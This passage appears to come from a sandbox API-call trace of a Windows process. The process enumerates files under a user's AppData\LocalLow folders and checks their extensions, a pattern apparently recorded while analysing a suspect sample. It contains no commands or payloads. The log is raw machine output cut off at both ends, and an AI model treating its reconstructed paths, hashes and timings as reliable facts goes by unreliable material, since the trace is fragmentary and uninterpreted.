ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0098.054] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0098.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0098.054] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0098.054] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.054] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.054] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.055] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa18 | out: hHeap=0x680000) returned 1 [0098.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.055] PathFindFileNameW (pszPath="") returned="" [0098.056] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.056] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0098.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0098.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0098.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.057] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.057] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.057] PathFindFileNameW (pszPath="") returned="" [0098.057] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0098.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.057] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0098.057] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0098.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.057] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0098.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.058] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0098.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0098.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0098.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, 